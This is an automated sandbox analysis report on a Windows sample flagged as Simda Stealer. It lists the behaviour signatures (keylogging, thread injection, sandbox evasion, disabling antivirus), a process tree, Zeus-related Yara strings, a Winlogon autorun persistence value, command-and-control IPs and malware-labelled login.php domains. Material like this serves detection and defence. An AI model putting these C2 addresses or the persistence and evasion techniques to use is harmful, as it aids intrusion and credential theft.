Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
arxtPs1STE.exe

Overview

General Information

Sample name:arxtPs1STE.exe
renamed because original name is a hash value
Original sample name:ce4b4763d9b269ea600e8fc594781882ca6c8486.exe
Analysis ID:1553832
MD5:6154c4f64b8f9185a4644cdea5c69408
SHA1:ce4b4763d9b269ea600e8fc594781882ca6c8486
SHA256:a484e354b3c1d5e13033067711a085fae7e74b53c6b003c10306ed58fc9a0288
Tags:exeuser-NDA0E
Infos:

Detection

Simda Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Simda Stealer
AI detected suspicious sample
Allocates memory in foreign processes
Checks if browser processes are running
Contains VNC / remote desktop functionality (version string found)
Contains functionality to behave differently if execute on a Russian/Kazak computer
Contains functionality to capture and log keystrokes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect sandboxes (registry SystemBiosVersion/Date)
Contains functionality to infect the boot sector
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking volume information)
Found evasive API chain checking for user administrative privileges
Found stalling execution ending in API Sleep call
Injects a PE file into a foreign processes
Machine Learning detection for sample
Monitors registry run keys for changes
Moves itself to temp directory
Queries Google from non browser process on port 80
Queries random domain names (often used to prevent blacklisting and sinkholes)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to resolve many domain names, but no domain seems valid
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to create system tasks
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables security privileges
Executes massive DNS lookups (> 100)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (might use process or thread times for sandbox detection)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May initialize a security null descriptor
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Tries to disable installed Antivirus / HIPS / PFW
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • arxtPs1STE.exe (PID: 7600 cmdline: "C:\Users\user\Desktop\arxtPs1STE.exe" MD5: 6154C4F64B8F9185A4644CDEA5C69408)
    • svchost.exe (PID: 7652 cmdline: "C:\Windows\apppatch\svchost.exe" MD5: 5415F923D36E5D49E48A46CDF5D4B082)
      • tGYLgZxMWmmBTD.exe (PID: 7376 cmdline: "C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 5700 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7376 -s 776 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • tGYLgZxMWmmBTD.exe (PID: 7352 cmdline: "C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7032 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7352 -s 748 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • tGYLgZxMWmmBTD.exe (PID: 7328 cmdline: "C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 4564 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7328 -s 756 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • tGYLgZxMWmmBTD.exe (PID: 7304 cmdline: "C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 1996 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7304 -s 740 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • tGYLgZxMWmmBTD.exe (PID: 7280 cmdline: "C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • tGYLgZxMWmmBTD.exe (PID: 7256 cmdline: "C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • tGYLgZxMWmmBTD.exe (PID: 7232 cmdline: "C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • tGYLgZxMWmmBTD.exe (PID: 7212 cmdline: "C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 2976 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7212 -s 740 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • tGYLgZxMWmmBTD.exe (PID: 7188 cmdline: "C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • tGYLgZxMWmmBTD.exe (PID: 344 cmdline: "C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7876 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 732 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • tGYLgZxMWmmBTD.exe (PID: 3964 cmdline: "C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7684 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3964 -s 756 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • tGYLgZxMWmmBTD.exe (PID: 1080 cmdline: "C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • tGYLgZxMWmmBTD.exe (PID: 3872 cmdline: "C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000003.1857902418.0000000002C70000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
0000001F.00000002.1890678971.00000000029B0000.00000040.00000001.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x4b260:$a1: name=%s&port=%u
  • 0x4a9f8:$a2: data_inject
  • 0x4abe4:$a3: keylog.txt
  • 0x4a88d:$a4: User-agent: %s]]]
  • 0x4b3b4:$a5: %s\%02d.bmp
00000002.00000003.1843970657.0000000002C70000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
00000002.00000003.1887006927.0000000002C70000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
00000002.00000003.1889204820.0000000002C70000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
Click to see the 100 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
2.3.svchost.exe.2c70000.17.raw.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
2.3.svchost.exe.2c70000.10.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x48660:$a1: name=%s&port=%u
  • 0x47df8:$a2: data_inject
  • 0x47fe4:$a3: keylog.txt
  • 0x47c8d:$a4: User-agent: %s]]]
  • 0x487b4:$a5: %s\%02d.bmp
2.3.svchost.exe.883000.4.raw.unpackJoeSecurity_SimdaStealerYara detected Simda StealerJoe Security
    2.3.svchost.exe.883000.4.raw.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
    • 0x4f260:$a1: name=%s&port=%u
    • 0x4e9f8:$a2: data_inject
    • 0x4ebe4:$a3: keylog.txt
    • 0x4e88d:$a4: User-agent: %s]]]
    • 0x4f3b4:$a5: %s\%02d.bmp
    2.3.svchost.exe.889000.0.raw.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
    • 0x49260:$a1: name=%s&port=%u
    • 0x489f8:$a2: data_inject
    • 0x48be4:$a3: keylog.txt
    • 0x4888d:$a4: User-agent: %s]]]
    • 0x493b4:$a5: %s\%02d.bmp
    Click to see the 181 entries

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Files With System Process Name In Unsuspected Locations
    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\arxtPs1STE.exe, ProcessId: 7600, TargetFilename: C:\Windows\apppatch\svchost.exe
    Sigma detected: System File Execution Location Anomaly
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\arxtPs1STE.exe", ParentImage: C:\Users\user\Desktop\arxtPs1STE.exe, ParentProcessId: 7600, ParentProcessName: arxtPs1STE.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 7652, ProcessName: svchost.exe
    Sigma detected: CurrentVersion NT Autorun Keys Modification
    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\system32\userinit.exe,C:\Windows\apppatch\svchost.exe,, EventID: 13, EventType: SetValue, Image: C:\Windows\apppatch\svchost.exe, ProcessId: 7652, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit
    Sigma detected: Uncommon Svchost Parent Process
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\arxtPs1STE.exe", ParentImage: C:\Users\user\Desktop\arxtPs1STE.exe, ParentProcessId: 7600, ParentProcessName: arxtPs1STE.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 7652, ProcessName: svchost.exe
    Sigma detected: Windows Processes Suspicious Parent Directory
    Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\arxtPs1STE.exe", ParentImage: C:\Users\user\Desktop\arxtPs1STE.exe, ParentProcessId: 7600, ParentProcessName: arxtPs1STE.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 7652, ProcessName: svchost.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-11T18:33:22.840403+010020229301A Network Trojan was detected172.202.163.200443192.168.2.849740TCP
    2024-11-11T18:34:05.064133+010020229301A Network Trojan was detected4.175.87.197443192.168.2.860697TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-11T18:33:08.800308+010020181411A Network Trojan was detected3.94.10.3480192.168.2.849708TCP
    2024-11-11T18:33:09.412393+010020181411A Network Trojan was detected18.208.156.24880192.168.2.849718TCP
    2024-11-11T18:33:20.314026+010020181411A Network Trojan was detected44.221.84.10580192.168.2.849737TCP
    2024-11-11T18:33:29.077761+010020181411A Network Trojan was detected52.34.198.22980192.168.2.858380TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-11T18:33:08.800308+010020377711A Network Trojan was detected3.94.10.3480192.168.2.849708TCP
    2024-11-11T18:33:09.412393+010020377711A Network Trojan was detected18.208.156.24880192.168.2.849718TCP
    2024-11-11T18:33:20.314026+010020377711A Network Trojan was detected44.221.84.10580192.168.2.849737TCP
    2024-11-11T18:33:29.077761+010020377711A Network Trojan was detected52.34.198.22980192.168.2.858380TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-11T18:33:08.071459+010020210221A Network Trojan was detected1.1.1.153192.168.2.856804UDP
    2024-11-11T18:33:57.677062+010020210221A Network Trojan was detected1.1.1.153192.168.2.855157UDP
    2024-11-11T18:35:02.384951+010020210221A Network Trojan was detected1.1.1.153192.168.2.858292UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-11T18:33:08.793724+010028048521Malware Command and Control Activity Detected192.168.2.8497083.94.10.3480TCP
    2024-11-11T18:33:08.796276+010028048521Malware Command and Control Activity Detected192.168.2.849711199.59.243.22780TCP
    2024-11-11T18:33:08.813310+010028048521Malware Command and Control Activity Detected192.168.2.849710208.100.26.24580TCP
    2024-11-11T18:33:08.863846+010028048521Malware Command and Control Activity Detected192.168.2.849713178.162.217.10780TCP
    2024-11-11T18:33:08.912194+010028048521Malware Command and Control Activity Detected192.168.2.849707162.255.119.10280TCP
    2024-11-11T18:33:08.918825+010028048521Malware Command and Control Activity Detected192.168.2.849710208.100.26.24580TCP
    2024-11-11T18:33:09.078196+010028048521Malware Command and Control Activity Detected192.168.2.84971475.2.71.19980TCP
    2024-11-11T18:33:09.085382+010028048521Malware Command and Control Activity Detected192.168.2.849712188.114.96.380TCP
    2024-11-11T18:33:09.097256+010028048521Malware Command and Control Activity Detected192.168.2.84971544.221.84.10580TCP
    2024-11-11T18:33:09.314628+010028048521Malware Command and Control Activity Detected192.168.2.849716178.162.217.10780TCP
    2024-11-11T18:33:09.403334+010028048521Malware Command and Control Activity Detected192.168.2.84971818.208.156.24880TCP
    2024-11-11T18:33:09.609748+010028048521Malware Command and Control Activity Detected192.168.2.84972144.221.84.10580TCP
    2024-11-11T18:33:09.719227+010028048521Malware Command and Control Activity Detected192.168.2.84971791.195.240.1980TCP
    2024-11-11T18:33:10.201487+010028048521Malware Command and Control Activity Detected192.168.2.84971975.2.71.199443TCP
    2024-11-11T18:33:10.653425+010028048521Malware Command and Control Activity Detected192.168.2.849709199.191.50.8380TCP
    2024-11-11T18:33:10.743945+010028048521Malware Command and Control Activity Detected192.168.2.849720188.114.96.3443TCP
    2024-11-11T18:33:10.778933+010028048521Malware Command and Control Activity Detected192.168.2.849722154.212.231.8280TCP
    2024-11-11T18:33:11.171725+010028048521Malware Command and Control Activity Detected192.168.2.849712188.114.96.380TCP
    2024-11-11T18:33:11.177018+010028048521Malware Command and Control Activity Detected192.168.2.849722154.212.231.8280TCP
    2024-11-11T18:33:12.368917+010028048521Malware Command and Control Activity Detected192.168.2.849723188.114.96.3443TCP
    2024-11-11T18:33:12.903967+010028048521Malware Command and Control Activity Detected192.168.2.84972413.248.169.4880TCP
    2024-11-11T18:33:13.177712+010028048521Malware Command and Control Activity Detected192.168.2.8497263.94.10.3480TCP
    2024-11-11T18:33:13.302136+010028048521Malware Command and Control Activity Detected192.168.2.84972718.208.156.24880TCP
    2024-11-11T18:33:13.584548+010028048521Malware Command and Control Activity Detected192.168.2.849725188.114.96.380TCP
    2024-11-11T18:33:13.860185+010028048521Malware Command and Control Activity Detected192.168.2.849728103.150.10.4880TCP
    2024-11-11T18:33:14.967974+010028048521Malware Command and Control Activity Detected192.168.2.849728103.150.10.4880TCP
    2024-11-11T18:33:15.763972+010028048521Malware Command and Control Activity Detected192.168.2.849729188.114.96.3443TCP
    2024-11-11T18:33:16.124114+010028048521Malware Command and Control Activity Detected192.168.2.849725188.114.96.380TCP
    2024-11-11T18:33:19.047348+010028048521Malware Command and Control Activity Detected192.168.2.849731188.114.96.3443TCP
    2024-11-11T18:33:19.622159+010028048521Malware Command and Control Activity Detected192.168.2.84973276.223.67.18980TCP
    2024-11-11T18:33:19.802617+010028048521Malware Command and Control Activity Detected192.168.2.84973364.225.91.7380TCP
    2024-11-11T18:33:20.052303+010028048521Malware Command and Control Activity Detected192.168.2.849734103.224.182.25280TCP
    2024-11-11T18:33:20.062966+010028048521Malware Command and Control Activity Detected192.168.2.849735103.224.212.21080TCP
    2024-11-11T18:33:20.307399+010028048521Malware Command and Control Activity Detected192.168.2.84973744.221.84.10580TCP
    2024-11-11T18:33:20.393632+010028048521Malware Command and Control Activity Detected192.168.2.849736154.85.183.5080TCP
    2024-11-11T18:33:20.680567+010028048521Malware Command and Control Activity Detected192.168.2.849736154.85.183.5080TCP
    2024-11-11T18:33:22.587036+010028048521Malware Command and Control Activity Detected192.168.2.84974164.225.91.7380TCP
    2024-11-11T18:33:23.106964+010028048521Malware Command and Control Activity Detected192.168.2.86255472.52.179.17480TCP
    2024-11-11T18:33:23.804814+010028048521Malware Command and Control Activity Detected192.168.2.86255672.52.179.17480TCP
    2024-11-11T18:33:29.068647+010028048521Malware Command and Control Activity Detected192.168.2.85838052.34.198.22980TCP
    2024-11-11T18:33:32.189594+010028048521Malware Command and Control Activity Detected192.168.2.86000344.221.84.10580TCP
    2024-11-11T18:33:34.095463+010028048521Malware Command and Control Activity Detected192.168.2.849710208.100.26.24580TCP
    2024-11-11T18:33:34.214644+010028048521Malware Command and Control Activity Detected192.168.2.849710208.100.26.24580TCP
    2024-11-11T18:33:34.347364+010028048521Malware Command and Control Activity Detected192.168.2.849712188.114.96.380TCP
    2024-11-11T18:33:34.404903+010028048521Malware Command and Control Activity Detected192.168.2.850108178.162.217.10780TCP
    2024-11-11T18:33:34.421631+010028048521Malware Command and Control Activity Detected192.168.2.850106199.59.243.22780TCP
    2024-11-11T18:33:34.422402+010028048521Malware Command and Control Activity Detected192.168.2.849722154.212.231.8280TCP
    2024-11-11T18:33:34.503616+010028048521Malware Command and Control Activity Detected192.168.2.85010975.2.71.19980TCP
    2024-11-11T18:33:34.542556+010028048521Malware Command and Control Activity Detected192.168.2.850107162.255.119.10280TCP
    2024-11-11T18:33:35.316307+010028048521Malware Command and Control Activity Detected192.168.2.850110178.162.217.10780TCP
    2024-11-11T18:33:35.687121+010028048521Malware Command and Control Activity Detected192.168.2.85011275.2.71.199443TCP
    2024-11-11T18:33:35.785679+010028048521Malware Command and Control Activity Detected192.168.2.849722154.212.231.8280TCP
    2024-11-11T18:33:36.066459+010028048521Malware Command and Control Activity Detected192.168.2.85011391.195.240.1980TCP
    2024-11-11T18:33:36.398416+010028048521Malware Command and Control Activity Detected192.168.2.850111188.114.96.3443TCP
    2024-11-11T18:33:36.805439+010028048521Malware Command and Control Activity Detected192.168.2.849712188.114.96.380TCP
    2024-11-11T18:33:38.017296+010028048521Malware Command and Control Activity Detected192.168.2.850114188.114.96.3443TCP
    2024-11-11T18:33:38.499010+010028048521Malware Command and Control Activity Detected192.168.2.849728103.150.10.4880TCP
    2024-11-11T18:33:38.526649+010028048521Malware Command and Control Activity Detected192.168.2.849725188.114.96.380TCP
    2024-11-11T18:33:39.383050+010028048521Malware Command and Control Activity Detected192.168.2.849728103.150.10.4880TCP
    2024-11-11T18:33:40.905596+010028048521Malware Command and Control Activity Detected192.168.2.850115188.114.96.3443TCP
    2024-11-11T18:33:41.269729+010028048521Malware Command and Control Activity Detected192.168.2.849725188.114.96.380TCP
    2024-11-11T18:33:43.234703+010028048521Malware Command and Control Activity Detected192.168.2.850116188.114.96.3443TCP
    2024-11-11T18:33:44.359831+010028048521Malware Command and Control Activity Detected192.168.2.850117103.224.212.21080TCP
    2024-11-11T18:33:44.512999+010028048521Malware Command and Control Activity Detected192.168.2.849736154.85.183.5080TCP
    2024-11-11T18:33:44.760611+010028048521Malware Command and Control Activity Detected192.168.2.850118103.224.182.25280TCP
    2024-11-11T18:33:47.260110+010028048521Malware Command and Control Activity Detected192.168.2.849736154.85.183.5080TCP
    2024-11-11T18:33:51.115283+010028048521Malware Command and Control Activity Detected192.168.2.86066972.52.179.17480TCP
    2024-11-11T18:33:52.527855+010028048521Malware Command and Control Activity Detected192.168.2.86067372.52.179.17480TCP
    2024-11-11T18:34:03.909558+010028048521Malware Command and Control Activity Detected192.168.2.860687188.114.96.380TCP
    2024-11-11T18:34:03.910005+010028048521Malware Command and Control Activity Detected192.168.2.86069075.2.71.19980TCP
    2024-11-11T18:34:04.004679+010028048521Malware Command and Control Activity Detected192.168.2.860696188.114.96.380TCP
    2024-11-11T18:34:04.020892+010028048521Malware Command and Control Activity Detected192.168.2.860700208.100.26.24580TCP
    2024-11-11T18:34:04.021032+010028048521Malware Command and Control Activity Detected192.168.2.86070244.221.84.10580TCP
    2024-11-11T18:34:04.021086+010028048521Malware Command and Control Activity Detected192.168.2.860698188.114.96.380TCP
    2024-11-11T18:34:04.021151+010028048521Malware Command and Control Activity Detected192.168.2.86069544.221.84.10580TCP
    2024-11-11T18:34:04.021169+010028048521Malware Command and Control Activity Detected192.168.2.86070123.253.46.6480TCP
    2024-11-11T18:34:04.021867+010028048521Malware Command and Control Activity Detected192.168.2.86069475.2.71.19980TCP
    2024-11-11T18:34:05.780817+010028048521Malware Command and Control Activity Detected192.168.2.8607103.94.10.3480TCP
    2024-11-11T18:34:05.780873+010028048521Malware Command and Control Activity Detected192.168.2.860709199.191.50.8380TCP
    2024-11-11T18:35:02.985591+010028048521Malware Command and Control Activity Detected192.168.2.854073162.255.119.10280TCP
    2024-11-11T18:35:02.985591+010028048521Malware Command and Control Activity Detected192.168.2.857727199.59.243.22780TCP
    2024-11-11T18:35:02.985971+010028048521Malware Command and Control Activity Detected192.168.2.85773075.2.71.19980TCP
    2024-11-11T18:35:03.002515+010028048521Malware Command and Control Activity Detected192.168.2.85772844.221.84.10580TCP
    2024-11-11T18:35:03.031389+010028048521Malware Command and Control Activity Detected192.168.2.8577313.94.10.3480TCP
    2024-11-11T18:35:03.045737+010028048521Malware Command and Control Activity Detected192.168.2.857729208.100.26.24580TCP
    2024-11-11T18:35:03.161869+010028048521Malware Command and Control Activity Detected192.168.2.85773218.208.156.24880TCP
    2024-11-11T18:35:03.164148+010028048521Malware Command and Control Activity Detected192.168.2.85773344.221.84.10580TCP
    2024-11-11T18:35:03.235707+010028048521Malware Command and Control Activity Detected192.168.2.857726188.114.96.380TCP
    2024-11-11T18:35:03.404492+010028048521Malware Command and Control Activity Detected192.168.2.85773575.2.71.19980TCP
    2024-11-11T18:35:03.560839+010028048521Malware Command and Control Activity Detected192.168.2.857736208.100.26.24580TCP
    2024-11-11T18:35:03.771982+010028048521Malware Command and Control Activity Detected192.168.2.85773791.195.240.1980TCP
    2024-11-11T18:35:05.028136+010028048521Malware Command and Control Activity Detected192.168.2.857738188.114.96.3443TCP
    2024-11-11T18:35:05.146304+010028048521Malware Command and Control Activity Detected192.168.2.857734199.191.50.8380TCP
    2024-11-11T18:35:05.261454+010028048521Malware Command and Control Activity Detected192.168.2.857739154.212.231.8280TCP
    2024-11-11T18:35:05.626816+010028048521Malware Command and Control Activity Detected192.168.2.857739154.212.231.8280TCP
    2024-11-11T18:35:05.732821+010028048521Malware Command and Control Activity Detected192.168.2.857740188.114.96.380TCP
    2024-11-11T18:35:07.697982+010028048521Malware Command and Control Activity Detected192.168.2.857741188.114.96.3443TCP
    2024-11-11T18:35:10.732799+010028048521Malware Command and Control Activity Detected192.168.2.854072178.162.203.20280TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: arxtPs1STE.exeAvira: detected
    Antivirus detection for URL or domain
    Source: http://purymuq.com/login.phpAvira URL Cloud: Label: malware
    Source: http://purycap.com/login.phpAvira URL Cloud: Label: malware
    Source: http://qegyryq.com/login.phpAvira URL Cloud: Label: malware
    Source: http://vonymuf.com/login.phpcom/login.phpAvira URL Cloud: Label: malware
    Source: http://puzylyp.com/login.phpAvira URL Cloud: Label: malware
    Source: http://qedytul.com/Avira URL Cloud: Label: malware
    Source: http://galyryz.com/login.phpAvira URL Cloud: Label: malware
    Source: http://gatyviw.com/login.phpAvira URL Cloud: Label: malware
    Source: http://vopycoc.com/login.phpAvira URL Cloud: Label: malware
    Source: http://vopycom.com/login.phpAvira URL Cloud: Label: malware
    Source: http://ganyzub.com/login.phpAvira URL Cloud: Label: phishing
